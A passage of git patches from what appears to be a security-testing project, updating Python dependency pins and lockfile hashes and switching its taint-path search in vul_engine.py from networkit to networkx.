'3.5' -mysqlclient==2.2.0 +markupsafe==2.1.3; python_version >= '3.7' +marshmallow==3.20.1; python_version >= '3.8' +mock==5.1.0; python_version >= '3.6' +model-bakery==1.15.0; python_version >= '3' +mypy==1.0.1; python_version >= '3.7' +mypy-extensions==1.0.0; python_version >= '3.5' +mysqlclient==2.2.0; python_version >= '3.8' networkit==10.1 -numpy==1.25.1 ; python_version >= '3.9' +numpy==1.25.2; python_version >= '3.9' odfpy==1.4.1 -openpyxl==3.0.9 +openpyxl==3.0.9; python_version >= '3.6' oss2==2.13.1 -packaging==21.3 +packaging==21.3; python_version >= '3.6' pep8==1.7.1 -pillow==9.3.0 -prometheus-client==0.17.1 ; python_version >= '3.6' -prompt-toolkit==3.0.39 ; python_full_version >= '3.7.0' -pycodestyle==2.10.0 ; python_version >= '3.6' +pillow==9.3.0; python_version >= '3.7' +prometheus-client==0.17.1; python_version >= '3.6' +prompt-toolkit==3.0.39; python_full_version >= '3.7.0' +pycodestyle==2.11.0; python_version >= '3.8' pycparser==2.21 -pycryptodome==3.18.0 ; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4' -pycryptodomex==3.14.1 -pydantic==2.0.2 ; python_version >= '3.7' -pydantic-core==2.1.2 ; python_version >= '3.7' -pymysql==1.0.2 -pyparsing==3.1.0 ; python_full_version >= '3.6.8' -pyre2==0.3.6 -pyrsistent==0.19.1 -python-crontab==2.7.1 -python-dateutil==2.8.2 ; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3' +pycryptodome==3.18.0; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4' +pycryptodomex==3.14.1; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4' +pydantic==1.10.12; python_version >= '3.7' +pymysql==1.0.2; python_version >= '3.6' +pyparsing==3.1.1; python_full_version >= '3.6.8' +pyre2==0.3.6; python_version >= '3.6' +pyrsistent==0.19.1; python_version >= '3.7' +python-crontab==3.0.0 +python-dateutil==2.8.2; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3' python-docx==0.8.11 -python-json-logger==2.0.7 +python-json-logger==2.0.7; python_version >= '3.6' pytz==2022.6 -pyyaml==6.0 ; python_version >= '3.6' -redis==4.4.4 -requests==2.31.0 -result==0.8.0 -s3transfer==0.6.1 ; python_version >= '3.7' -scipy==1.11.1 ; python_version < '3.13' and python_version >= '3.9' -setuptools==65.5.1 -shortuuid==1.0.11 +pyyaml==6.0.1; python_version >= '3.6' +redis==4.4.4; python_version >= '3.7' +requests==2.31.0; python_version >= '3.7' +result==0.8.0; python_version >= '3.7' +s3transfer==0.6.2; python_version >= '3.7' +scipy==1.11.2; python_version < '3.13' and python_version >= '3.9' +setuptools==65.5.1; python_version >= '3.7' +shortuuid==1.0.11; python_version >= '3.5' simhash==2.1.2 -six==1.15.0 -sqlparse==0.4.4 ; python_version >= '3.5' -tablib[html,ods,xls,xlsx,yaml]==3.5.0 ; python_version >= '3.8' -tomli==2.0.1 ; python_version < '3.11' -tornado==6.3.3 ; python_version >= '3.8' -types-awscrt==0.16.23 ; python_version >= '3.7' and python_version < '4.0' -types-pymysql==1.1.0.0 -types-pyopenssl==23.2.0.1 -types-python-dateutil==2.8.19.13 -types-pytz==2023.3.0.0 -types-pyyaml==6.0.12.10 -types-redis==4.6.0.2 -types-requests==2.31.0.1 -types-s3transfer==0.6.1 ; python_version >= '3.7' and python_version < '4.0' -types-urllib3==1.26.25.13 -typing-extensions==4.7.1 +six==1.15.0; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3' +sqlparse==0.4.4; python_version >= '3.5' +tablib[html,ods,xls,xlsx,yaml]==3.5.0; python_version >= '3.8' +tomli==2.0.1; python_version < '3.11' +tornado==6.3.3; python_version >= '3.8' +types-awscrt==0.19.0; python_version >= '3.7' and python_version < '4.0' +types-pymysql==1.1.0.1 +types-pyopenssl==23.2.0.2 +types-python-dateutil==2.8.19.14 +types-pytz==2023.3.0.1 +types-pyyaml==6.0.12.11 +types-redis==4.6.0.5 +types-requests==2.31.0.2 +types-s3transfer==0.6.2; python_version >= '3.7' and python_version < '4.0' +types-urllib3==1.26.25.14 +typing-extensions==4.7.1; python_version >= '3.7' typing-inspect==0.9.0 -tzdata==2023.3 ; python_version >= '2' -uritemplate==4.1.1 ; python_version >= '3.6' -urllib3==1.26.5 +tzdata==2023.3; python_version >= '2' +uritemplate==4.1.1; python_version >= '3.6' +urllib3==1.26.5; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4' and python_version < '4' uwsgi==2.0.21 uwsgitop==0.11 -vine==5.0.0 ; python_version >= '3.6' +vine==5.0.0; python_version >= '3.6' wcwidth==0.2.6 xlrd==2.0.1 xlwt==1.3.0 -zope.event==5.0 ; python_version >= '3.7' -zope.interface==6.0 ; python_version >= '3.7' +zope.event==5.0; python_version >= '3.7' +zope.interface==6.0; python_version >= '3.7' From e27b9bdab0152b4730724f05479bae429d67b31f Mon Sep 17 00:00:00 2001 From: st1020 Date: Mon, 28 Aug 2023 15:04:18 +0800 Subject: [PATCH 028/114] feat: method pool save --- Pipfile.lock | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/Pipfile.lock b/Pipfile.lock index 05da131cf..db7e3c211 100644 --- a/Pipfile.lock +++ b/Pipfile.lock @@ -1,7 +1,7 @@ { "_meta": { "hash": { - "sha256": "8bce8867d66a1ba873c5ea667cbd41bff03a2e8599e9737e3ad120007d06b0f6" + "sha256": "f84eacc14dfb08f77cd0741c361d72e822c2b551d93db4256b756d5656d649c8" }, "pipfile-spec": 6, "requires": { @@ -1987,10 +1987,10 @@ }, "uwsgi": { "hashes": [ - "sha256:35a30d83791329429bc04fe44183ce4ab512fcf6968070a7bfba42fc5a0552a9" + "sha256:4cc4727258671ac5fa17ab422155e9aaef8a2008ebb86e4404b66deaae965db2" ], "index": "pypi", - "version": "==2.0.21" + "version": "==2.0.22" }, "uwsgitop": { "hashes": [ From c54157e5f88cf6d0a0846b60c31767c108904583 Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Mon, 28 Aug 2023 18:25:54 +0800 Subject: [PATCH 029/114] feat: reduce memory usage in vul scan. --- .gitignore | 1 + dongtai_common/engine/vul_engine.py | 3 ++- 2 files changed, 3 insertions(+), 1 deletion(-) diff --git a/.gitignore b/.gitignore index 73a551e95..979d5f7a1 100644 --- a/.gitignore +++ b/.gitignore @@ -32,3 +32,4 @@ celerybeat.pid *.o *.c *.prof +*.dat diff --git a/dongtai_common/engine/vul_engine.py b/dongtai_common/engine/vul_engine.py index 9b87c6cdd..36f404c25 100644 --- a/dongtai_common/engine/vul_engine.py +++ b/dongtai_common/engine/vul_engine.py @@ -179,8 +179,9 @@ def search(self, method_pool, vul_method_signature, vul_type=None): for s, t in product(source_methods, vul_methods): if not g.hasNode(s) or not g.hasNode(t): continue - dij_obj = nk.distance.BidirectionalDijkstra(g, s, t).run() + dij_obj = nk.distance.BidirectionalBFS(g, s, t, False).run() if dij_obj.getDistance() < sys.float_info.max: + dij_obj = nk.distance.BidirectionalBFS(g, s, t).run() logger.info("find sink here!") path = dij_obj.getPath() total_path = [s, *path, t] From 7a7b7580a0dc64978c62dbc103c00bc61bdc20c6 Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Mon, 28 Aug 2023 18:55:49 +0800 Subject: [PATCH 030/114] feat: change to networkx --- dongtai_common/engine/vul_engine.py | 22 +++++++++------------- 1 file changed, 9 insertions(+), 13 deletions(-) diff --git a/dongtai_common/engine/vul_engine.py b/dongtai_common/engine/vul_engine.py index 36f404c25..c79296557 100644 --- a/dongtai_common/engine/vul_engine.py +++ b/dongtai_common/engine/vul_engine.py @@ -133,7 +133,7 @@ def search(self, method_pool, vul_method_signature, vul_type=None): from functools import reduce from itertools import product - import networkit as nk + import networkx as nk # Gather data source_hash_dict = defaultdict(set) @@ -171,21 +171,17 @@ def search(self, method_pool, vul_method_signature, vul_type=None): for s in reduce(lambda x, y: x | y, (target_hash_dict[i] for i in pool["sourceHash"]), set()) ) for source, target in vecs: - g.addEdge(source, target, (source - target) * (source - target), addMissing=True) - # Checkout each pair source/target have a path or not - # It may lost sth when multi paths exists. + # g.addEdge(source, target, (source - target) * (source - target), addMissing=True) + g.add_edge(source, target, weight=(source - target) * (source - target)) final_stack = [] total_path_list = [] for s, t in product(source_methods, vul_methods): - if not g.hasNode(s) or not g.hasNode(t): + if not g.has_node(s) or not g.has_node(t): continue - dij_obj = nk.distance.BidirectionalBFS(g, s, t, False).run() - if dij_obj.getDistance() < sys.float_info.max: - dij_obj = nk.distance.BidirectionalBFS(g, s, t).run() - logger.info("find sink here!") - path = dij_obj.getPath() - total_path = [s, *path, t] - # Check taint range exists + if nk.has_path(g, s, t): + path = nk.shortest_path(g, s, t, weight="weight") + total_path = path + total_path_list.append(total_path) if ( len(total_path) > 1 and "targetRange" in invokeid_dict[total_path[-2]] @@ -199,7 +195,7 @@ def search(self, method_pool, vul_method_signature, vul_type=None): == 0 ): continue - total_path_list.append(total_path) + total_path_list.append(total_path) final_path = [] for path in total_path_list: find_index = None From 5f89edd8af4e2ca9966e88d52c36af6b79af9e57 Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Mon, 28 Aug 2023 19:00:51 +0800 Subject: [PATCH 031/114] deps: add networkx --- Pipfile | 1 + Pipfile.lock | 4121 +++++++++++++++++++++++----------------------- requirements.txt | 211 +-- 3 files changed, 2152 insertions(+), 2181 deletions(-) diff --git a/Pipfile b/Pipfile index 7229fd4c9..16bf232e6 100644 --- a/Pipfile +++ b/Pipfile @@ -90,6 +90,7 @@ flower = "~=2.0.0" django-health-check = "==3.17.0" django-prometheus = "==2.3.1" django-add-default-value = "==0.10.0" +networkx = {extras = ["all"], version = "*"} [dev-packages] diff --git a/Pipfile.lock b/Pipfile.lock index db7e3c211..72f554e15 100644 --- a/Pipfile.lock +++ b/Pipfile.lock @@ -1,2078 +1,2047 @@ { - "_meta": { - "hash": { - "sha256": "f84eacc14dfb08f77cd0741c361d72e822c2b551d93db4256b756d5656d649c8" - }, - "pipfile-spec": 6, - "requires": { - "python_version": "3.10" - }, - "sources": [ - { - "name": "pypi", - "url": "https://pypi.org/simple", - "verify_ssl": true - } - ] - }, - "default": { - "aliyun-python-sdk-core": { - "hashes": [ - "sha256:20bd54984fa316da700c7f355a51ab0b816690e2a0fcefb7b5ef013fed0da928" - ], - "version": "==2.13.36" - }, - "aliyun-python-sdk-core-v3": { - "hashes": [ - "sha256:d7df820fa31193be3f0a3a991c4126051900b3d2f09c0fc5ff7af43cf36ac245" - ], - "version": "==2.13.33" - }, - "aliyun-python-sdk-kms": { - "hashes": [ - "sha256:9bc39c693ba83944f5dfb871b118a2925eb8a5ee214dfcce61ee2ea3b6317ef1", - "sha256:a372737715682014bace68bd40fe83332f4fd925009a3eb110d41bc66f270e7a" - ], - "version": "==2.16.1" - }, - "amqp": { - "hashes": [ - "sha256:2c1b13fecc0893e946c65cbd5f36427861cffa4ea2201d8f6fca22e2a373b5e2", - "sha256:6f0956d2c23d8fa6e7691934d8c3930eadb44972cbbd1a7ae3a520f735d43359" - ], - "markers": "python_version >= '3.6'", - "version": "==5.1.1" - }, - "asgiref": { - "hashes": [ - "sha256:89b2ef2247e3b562a16eef663bc0e2e703ec6468e2fa8a5cd61cd449786d4f6e", - "sha256:9e0ce3aa93a819ba5b45120216b23878cf6e8525eb3848653452b4192b92afed" - ], - "index": "pypi", - "markers": "python_version >= '3.7'", - "version": "==3.7.2" - }, - "async-timeout": { - "hashes": [ - "sha256:4640d96be84d82d02ed59ea2b7105a0f7b33abe8703703cd0ab0bf87c427522f", - "sha256:7405140ff1230c310e51dc27b3145b9092d659ce68ff733fb0cefe3ee42be028" - ], - "markers": "python_version >= '3.7'", - "version": "==4.0.3" - }, - "attrs": { - "hashes": [ - "sha256:1f28b4522cdc2fb4256ac1a020c78acf9cba2c6b461ccd2c126f3aa8e8335d04", - "sha256:6279836d581513a26f1bf235f9acd333bc9115683f14f7e8fae46c98fc50e015" - ], - "markers": "python_version >= '3.7'", - "version": "==23.1.0" - }, - "autopep8": { - "hashes": [ - "sha256:067959ca4a07b24dbd5345efa8325f5f58da4298dab0dde0443d5ed765de80cb", - "sha256:2913064abd97b3419d1cc83ea71f042cb821f87e45b9c88cad5ad3c4ea87fe0c" - ], - "markers": "python_version >= '3.6'", - "version": "==2.0.4" - }, - "billiard": { - "hashes": [ - "sha256:0f50d6be051c6b2b75bfbc8bfd85af195c5739c281d3f5b86a5640c65563614a", - "sha256:1ad2eeae8e28053d729ba3373d34d9d6e210f6e4d8bf0a9c64f92bd053f1edf5" - ], - "markers": "python_version >= '3.7'", - "version": "==4.1.0" - }, - "boto3": { - "hashes": [ - "sha256:34ab44146a2c4e7f4e72737f4b27e6eb5e0a7855c2f4599e3d9199b6a0a2d575", - "sha256:a50b4323f9579cfe22fcf5531fbd40b567d4d74c1adce06aeb5c95fce2a6fb40" - ], - "index": "pypi", - "markers": "python_version >= '3.7'", - "version": "==1.24.59" - }, - "boto3-stubs": { - "hashes": [ - "sha256:68c9c5b88982aea2023225815cf4aef8ec8deeecce9b6225d2d71cfad2247a10", - "sha256:7fca135b829888dea640b13d1ba508e3b2c0c31135ca8b07a11dda0247067d37" - ], - "index": "pypi", - "markers": "python_version >= '3.7'", - "version": "==1.28.35" - }, - "botocore": { - "hashes": [ - "sha256:1d6e97bd8653f732c7078b34aa2bb438e750898957e5a0a74b6c72918bc1d0f7", - "sha256:c8fac203a391cc2e4b682877bfce70e723e33c529b35b399a1d574605fbeb1af" - ], - "index": "pypi", - "markers": "python_version >= '3.7'", - "version": "==1.27.91" - }, - "botocore-stubs": { - "hashes": [ - "sha256:19cf4813f717ebf112eeb8908c61385bce44163d5e827cc3debe5a6b63f4ef04", - "sha256:96858fb8bcf1f4413629b1f9484588e5d6bf3f9c20a37b2e760edf94f4b64c00" - ], - "index": "pypi", - "markers": "python_version >= '3.7' and python_version < '4.0'", - "version": "==1.31.35" - }, - "celery": { - "hashes": [ - "sha256:0f104775617974c9a108857c883dd5a5b0a9058278bccf1881ff5d3317fa15ab", - "sha256:3afa81e7c6393097a4079badc11117ac20a1bf145c92ae5f1cc3ed24c2b1f165" - ], - "index": "pypi", - "markers": "python_version >= '3.7'", - "version": "==5.3.0rc1" - }, - "celery-singleton": { - "hashes": [ - "sha256:260ce4978e631f8682ea0ccb03d7f3b87d42bc20e04e9bd46ddb78a2f8035d1e", - "sha256:76b30a1bbe31d42030924b3eecfcaae2ab3ab99bf43e607cd46437f012434420" - ], - "index": "pypi", - "markers": "python_version >= '3.6' and python_version < '4.0'", - "version": "==0.3.1" - }, - "certifi": { - "hashes": [ - "sha256:539cc1d13202e33ca466e88b2807e29f4c13049d6d87031a3c110744495cb082", - "sha256:92d6037539857d8206b8f6ae472e8b77db8058fec5937a1ef3f54304089edbb9" - ], - "index": "pypi", - "markers": "python_version >= '3.6'", - "version": "==2023.7.22" - }, - "cffi": { - "hashes": [ - "sha256:00a9ed42e88df81ffae7a8ab6d9356b371399b91dbdf0c3cb1e84c03a13aceb5", - "sha256:03425bdae262c76aad70202debd780501fabeaca237cdfddc008987c0e0f59ef", - "sha256:04ed324bda3cda42b9b695d51bb7d54b680b9719cfab04227cdd1e04e5de3104", - "sha256:0e2642fe3142e4cc4af0799748233ad6da94c62a8bec3a6648bf8ee68b1c7426", - "sha256:173379135477dc8cac4bc58f45db08ab45d228b3363adb7af79436135d028405", - "sha256:198caafb44239b60e252492445da556afafc7d1e3ab7a1fb3f0584ef6d742375", - "sha256:1e74c6b51a9ed6589199c787bf5f9875612ca4a8a0785fb2d4a84429badaf22a", - "sha256:2012c72d854c2d03e45d06ae57f40d78e5770d252f195b93f581acf3ba44496e", - "sha256:21157295583fe8943475029ed5abdcf71eb3911894724e360acff1d61c1d54bc", - "sha256:2470043b93ff09bf8fb1d46d1cb756ce6132c54826661a32d4e4d132e1977adf", - "sha256:285d29981935eb726a4399badae8f0ffdff4f5050eaa6d0cfc3f64b857b77185", - "sha256:30d78fbc8ebf9c92c9b7823ee18eb92f2e6ef79b45ac84db507f52fbe3ec4497", - "sha256:320dab6e7cb2eacdf0e658569d2575c4dad258c0fcc794f46215e1e39f90f2c3", - "sha256:33ab79603146aace82c2427da5ca6e58f2b3f2fb5da893ceac0c42218a40be35", - "sha256:3548db281cd7d2561c9ad9984681c95f7b0e38881201e157833a2342c30d5e8c", - "sha256:3799aecf2e17cf585d977b780ce79ff0dc9b78d799fc694221ce814c2c19db83", - "sha256:39d39875251ca8f612b6f33e6b1195af86d1b3e60086068be9cc053aa4376e21", - "sha256:3b926aa83d1edb5aa5b427b4053dc420ec295a08e40911296b9eb1b6170f6cca", - "sha256:3bcde07039e586f91b45c88f8583ea7cf7a0770df3a1649627bf598332cb6984", - "sha256:3d08afd128ddaa624a48cf2b859afef385b720bb4b43df214f85616922e6a5ac", - "sha256:3eb6971dcff08619f8d91607cfc726518b6fa2a9eba42856be181c6d0d9515fd", - "sha256:40f4774f5a9d4f5e344f31a32b5096977b5d48560c5592e2f3d2c4374bd543ee", - "sha256:4289fc34b2f5316fbb762d75362931e351941fa95fa18789191b33fc4cf9504a", - "sha256:470c103ae716238bbe698d67ad020e1db9d9dba34fa5a899b5e21577e6d52ed2", - "sha256:4f2c9f67e9821cad2e5f480bc8d83b8742896f1242dba247911072d4fa94c192", - "sha256:50a74364d85fd319352182ef59c5c790484a336f6db772c1a9231f1c3ed0cbd7", - "sha256:54a2db7b78338edd780e7ef7f9f6c442500fb0d41a5a4ea24fff1c929d5af585", - "sha256:5635bd9cb9731e6d4a1132a498dd34f764034a8ce60cef4f5319c0541159392f", - "sha256:59c0b02d0a6c384d453fece7566d1c7e6b7bae4fc5874ef2ef46d56776d61c9e", - "sha256:5d598b938678ebf3c67377cdd45e09d431369c3b1a5b331058c338e201f12b27", - "sha256:5df2768244d19ab7f60546d0c7c63ce1581f7af8b5de3eb3004b9b6fc8a9f84b", - "sha256:5ef34d190326c3b1f822a5b7a45f6c4535e2f47ed06fec77d3d799c450b2651e", - "sha256:6975a3fac6bc83c4a65c9f9fcab9e47019a11d3d2cf7f3c0d03431bf145a941e", - "sha256:6c9a799e985904922a4d207a94eae35c78ebae90e128f0c4e521ce339396be9d", - "sha256:70df4e3b545a17496c9b3f41f5115e69a4f2e77e94e1d2a8e1070bc0c38c8a3c", - "sha256:7473e861101c9e72452f9bf8acb984947aa1661a7704553a9f6e4baa5ba64415", - "sha256:8102eaf27e1e448db915d08afa8b41d6c7ca7a04b7d73af6514df10a3e74bd82", - "sha256:87c450779d0914f2861b8526e035c5e6da0a3199d8f1add1a665e1cbc6fc6d02", - "sha256:8b7ee99e510d7b66cdb6c593f21c043c248537a32e0bedf02e01e9553a172314", - "sha256:91fc98adde3d7881af9b59ed0294046f3806221863722ba7d8d120c575314325", - "sha256:94411f22c3985acaec6f83c6df553f2dbe17b698cc7f8ae751ff2237d96b9e3c", - "sha256:98d85c6a2bef81588d9227dde12db8a7f47f639f4a17c9ae08e773aa9c697bf3", - "sha256:9ad5db27f9cabae298d151c85cf2bad1d359a1b9c686a275df03385758e2f914", - "sha256:a0b71b1b8fbf2b96e41c4d990244165e2c9be83d54962a9a1d118fd8657d2045", - "sha256:a0f100c8912c114ff53e1202d0078b425bee3649ae34d7b070e9697f93c5d52d", - "sha256:a591fe9e525846e4d154205572a029f653ada1a78b93697f3b5a8f1f2bc055b9", - "sha256:a5c84c68147988265e60416b57fc83425a78058853509c1b0629c180094904a5", - "sha256:a66d3508133af6e8548451b25058d5812812ec3798c886bf38ed24a98216fab2", - "sha256:a8c4917bd7ad33e8eb21e9a5bbba979b49d9a97acb3a803092cbc1133e20343c", - "sha256:b3bbeb01c2b273cca1e1e0c5df57f12dce9a4dd331b4fa1635b8bec26350bde3", - "sha256:cba9d6b9a7d64d4bd46167096fc9d2f835e25d7e4c121fb2ddfc6528fb0413b2", - "sha256:cc4d65aeeaa04136a12677d3dd0b1c0c94dc43abac5860ab33cceb42b801c1e8", - "sha256:ce4bcc037df4fc5e3d184794f27bdaab018943698f4ca31630bc7f84a7b69c6d", - "sha256:cec7d9412a9102bdc577382c3929b337320c4c4c4849f2c5cdd14d7368c5562d", - "sha256:d400bfb9a37b1351253cb402671cea7e89bdecc294e8016a707f6d1d8ac934f9", - "sha256:d61f4695e6c866a23a21acab0509af1cdfd2c013cf256bbf5b6b5e2695827162", - "sha256:db0fbb9c62743ce59a9ff687eb5f4afbe77e5e8403d6697f7446e5f609976f76", - "sha256:dd86c085fae2efd48ac91dd7ccffcfc0571387fe1193d33b6394db7ef31fe2a4", - "sha256:e00b098126fd45523dd056d2efba6c5a63b71ffe9f2bbe1a4fe1716e1d0c331e", - "sha256:e229a521186c75c8ad9490854fd8bbdd9a0c9aa3a524326b55be83b54d4e0ad9", - "sha256:e263d77ee3dd201c3a142934a086a4450861778baaeeb45db4591ef65550b0a6", - "sha256:ed9cb427ba5504c1dc15ede7d516b84757c3e3d7868ccc85121d9310d27eed0b", - "sha256:fa6693661a4c91757f4412306191b6dc88c1703f780c8234035eac011922bc01", - "sha256:fcd131dd944808b5bdb38e6f5b53013c5aa4f334c5cad0c72742f6eba4b73db0" - ], - "index": "pypi", - "version": "==1.15.1" - }, - "chardet": { - "hashes": [ - "sha256:1b3b6ff479a8c414bc3fa2c0852995695c4a026dcd6d0633b2dd092ca39c1cf7", - "sha256:e1cf59446890a00105fe7b7912492ea04b6e6f06d4b742b2c788469e34c82970" - ], - "index": "pypi", - "markers": "python_version >= '3.7'", - "version": "==5.2.0" - }, - "charset-normalizer": { - "hashes": [ - "sha256:04e57ab9fbf9607b77f7d057974694b4f6b142da9ed4a199859d9d4d5c63fe96", - "sha256:09393e1b2a9461950b1c9a45d5fd251dc7c6f228acab64da1c9c0165d9c7765c", - "sha256:0b87549028f680ca955556e3bd57013ab47474c3124dc069faa0b6545b6c9710", - "sha256:1000fba1057b92a65daec275aec30586c3de2401ccdcd41f8a5c1e2c87078706", - "sha256:1249cbbf3d3b04902ff081ffbb33ce3377fa6e4c7356f759f3cd076cc138d020", - "sha256:1920d4ff15ce893210c1f0c0e9d19bfbecb7983c76b33f046c13a8ffbd570252", - "sha256:193cbc708ea3aca45e7221ae58f0fd63f933753a9bfb498a3b474878f12caaad", - "sha256:1a100c6d595a7f316f1b6f01d20815d916e75ff98c27a01ae817439ea7726329", - "sha256:1f30b48dd7fa1474554b0b0f3fdfdd4c13b5c737a3c6284d3cdc424ec0ffff3a", - "sha256:203f0c8871d5a7987be20c72442488a0b8cfd0f43b7973771640fc593f56321f", - "sha256:246de67b99b6851627d945db38147d1b209a899311b1305dd84916f2b88526c6", - "sha256:2dee8e57f052ef5353cf608e0b4c871aee320dd1b87d351c28764fc0ca55f9f4", - "sha256:2efb1bd13885392adfda4614c33d3b68dee4921fd0ac1d3988f8cbb7d589e72a", - "sha256:2f4ac36d8e2b4cc1aa71df3dd84ff8efbe3bfb97ac41242fbcfc053c67434f46", - "sha256:3170c9399da12c9dc66366e9d14da8bf7147e1e9d9ea566067bbce7bb74bd9c2", - "sha256:3b1613dd5aee995ec6d4c69f00378bbd07614702a315a2cf6c1d21461fe17c23", - "sha256:3bb3d25a8e6c0aedd251753a79ae98a093c7e7b471faa3aa9a93a81431987ace", - "sha256:3bb7fda7260735efe66d5107fb7e6af6a7c04c7fce9b2514e04b7a74b06bf5dd", - "sha256:41b25eaa7d15909cf3ac4c96088c1f266a9a93ec44f87f1d13d4a0e86c81b982", - "sha256:45de3f87179c1823e6d9e32156fb14c1927fcc9aba21433f088fdfb555b77c10", - "sha256:46fb8c61d794b78ec7134a715a3e564aafc8f6b5e338417cb19fe9f57a5a9bf2", - "sha256:48021783bdf96e3d6de03a6e39a1171ed5bd7e8bb93fc84cc649d11490f87cea", - "sha256:4957669ef390f0e6719db3613ab3a7631e68424604a7b448f079bee145da6e09", - "sha256:5e86d77b090dbddbe78867a0275cb4df08ea195e660f1f7f13435a4649e954e5", - "sha256:6339d047dab2780cc6220f46306628e04d9750f02f983ddb37439ca47ced7149", - "sha256:681eb3d7e02e3c3655d1b16059fbfb605ac464c834a0c629048a30fad2b27489", - "sha256:6c409c0deba34f147f77efaa67b8e4bb83d2f11c8806405f76397ae5b8c0d1c9", - "sha256:7095f6fbfaa55defb6b733cfeb14efaae7a29f0b59d8cf213be4e7ca0b857b80", - "sha256:70c610f6cbe4b9fce272c407dd9d07e33e6bf7b4aa1b7ffb6f6ded8e634e3592", - "sha256:72814c01533f51d68702802d74f77ea026b5ec52793c791e2da806a3844a46c3", - "sha256:7a4826ad2bd6b07ca615c74ab91f32f6c96d08f6fcc3902ceeedaec8cdc3bcd6", - "sha256:7c70087bfee18a42b4040bb9ec1ca15a08242cf5867c58726530bdf3945672ed", - "sha256:855eafa5d5a2034b4621c74925d89c5efef61418570e5ef9b37717d9c796419c", - "sha256:8700f06d0ce6f128de3ccdbc1acaea1ee264d2caa9ca05daaf492fde7c2a7200", - "sha256:89f1b185a01fe560bc8ae5f619e924407efca2191b56ce749ec84982fc59a32a", - "sha256:8b2c760cfc7042b27ebdb4a43a4453bd829a5742503599144d54a032c5dc7e9e", - "sha256:8c2f5e83493748286002f9369f3e6607c565a6a90425a3a1fef5ae32a36d749d", - "sha256:8e098148dd37b4ce3baca71fb394c81dc5d9c7728c95df695d2dca218edf40e6", - "sha256:94aea8eff76ee6d1cdacb07dd2123a68283cb5569e0250feab1240058f53b623", - "sha256:95eb302ff792e12aba9a8b8f8474ab229a83c103d74a750ec0bd1c1eea32e669", - "sha256:9bd9b3b31adcb054116447ea22caa61a285d92e94d710aa5ec97992ff5eb7cf3", - "sha256:9e608aafdb55eb9f255034709e20d5a83b6d60c054df0802fa9c9883d0a937aa", - "sha256:a103b3a7069b62f5d4890ae1b8f0597618f628b286b03d4bc9195230b154bfa9", - "sha256:a386ebe437176aab38c041de1260cd3ea459c6ce5263594399880bbc398225b2", - "sha256:a38856a971c602f98472050165cea2cdc97709240373041b69030be15047691f", - "sha256:a401b4598e5d3f4a9a811f3daf42ee2291790c7f9d74b18d75d6e21dda98a1a1", - "sha256:a7647ebdfb9682b7bb97e2a5e7cb6ae735b1c25008a70b906aecca294ee96cf4", - "sha256:aaf63899c94de41fe3cf934601b0f7ccb6b428c6e4eeb80da72c58eab077b19a", - "sha256:b0dac0ff919ba34d4df1b6131f59ce95b08b9065233446be7e459f95554c0dc8", - "sha256:baacc6aee0b2ef6f3d308e197b5d7a81c0e70b06beae1f1fcacffdbd124fe0e3", - "sha256:bf420121d4c8dce6b889f0e8e4ec0ca34b7f40186203f06a946fa0276ba54029", - "sha256:c04a46716adde8d927adb9457bbe39cf473e1e2c2f5d0a16ceb837e5d841ad4f", - "sha256:c0b21078a4b56965e2b12f247467b234734491897e99c1d51cee628da9786959", - "sha256:c1c76a1743432b4b60ab3358c937a3fe1341c828ae6194108a94c69028247f22", - "sha256:c4983bf937209c57240cff65906b18bb35e64ae872da6a0db937d7b4af845dd7", - "sha256:c4fb39a81950ec280984b3a44f5bd12819953dc5fa3a7e6fa7a80db5ee853952", - "sha256:c57921cda3a80d0f2b8aec7e25c8aa14479ea92b5b51b6876d975d925a2ea346", - "sha256:c8063cf17b19661471ecbdb3df1c84f24ad2e389e326ccaf89e3fb2484d8dd7e", - "sha256:ccd16eb18a849fd8dcb23e23380e2f0a354e8daa0c984b8a732d9cfaba3a776d", - "sha256:cd6dbe0238f7743d0efe563ab46294f54f9bc8f4b9bcf57c3c666cc5bc9d1299", - "sha256:d62e51710986674142526ab9f78663ca2b0726066ae26b78b22e0f5e571238dd", - "sha256:db901e2ac34c931d73054d9797383d0f8009991e723dab15109740a63e7f902a", - "sha256:e03b8895a6990c9ab2cdcd0f2fe44088ca1c65ae592b8f795c3294af00a461c3", - "sha256:e1c8a2f4c69e08e89632defbfabec2feb8a8d99edc9f89ce33c4b9e36ab63037", - "sha256:e4b749b9cc6ee664a3300bb3a273c1ca8068c46be705b6c31cf5d276f8628a94", - "sha256:e6a5bf2cba5ae1bb80b154ed68a3cfa2fa00fde979a7f50d6598d3e17d9ac20c", - "sha256:e857a2232ba53ae940d3456f7533ce6ca98b81917d47adc3c7fd55dad8fab858", - "sha256:ee4006268ed33370957f55bf2e6f4d263eaf4dc3cfc473d1d90baff6ed36ce4a", - "sha256:eef9df1eefada2c09a5e7a40991b9fc6ac6ef20b1372abd48d2794a316dc0449", - "sha256:f058f6963fd82eb143c692cecdc89e075fa0828db2e5b291070485390b2f1c9c", - "sha256:f25c229a6ba38a35ae6e25ca1264621cc25d4d38dca2942a7fce0b67a4efe918", - "sha256:f2a1d0fd4242bd8643ce6f98927cf9c04540af6efa92323e9d3124f57727bfc1", - "sha256:f7560358a6811e52e9c4d142d497f1a6e10103d3a6881f18d04dbce3729c0e2c", - "sha256:f779d3ad205f108d14e99bb3859aa7dd8e9c68874617c72354d7ecaec2a054ac", - "sha256:f87f746ee241d30d6ed93969de31e5ffd09a2961a051e60ae6bddde9ec3583aa" - ], - "markers": "python_full_version >= '3.7.0'", - "version": "==3.2.0" - }, - "click": { - "hashes": [ - "sha256:ae74fb96c20a0277a1d615f1e4d73c8414f5a98db8b799a7931d1582f3390c28", - "sha256:ca9853ad459e787e2192211578cc907e7594e294c7ccc834310722b41b9ca6de" - ], - "markers": "python_version >= '3.7'", - "version": "==8.1.7" - }, - "click-didyoumean": { - "hashes": [ - "sha256:a0713dc7a1de3f06bc0df5a9567ad19ead2d3d5689b434768a6145bff77c0667", - 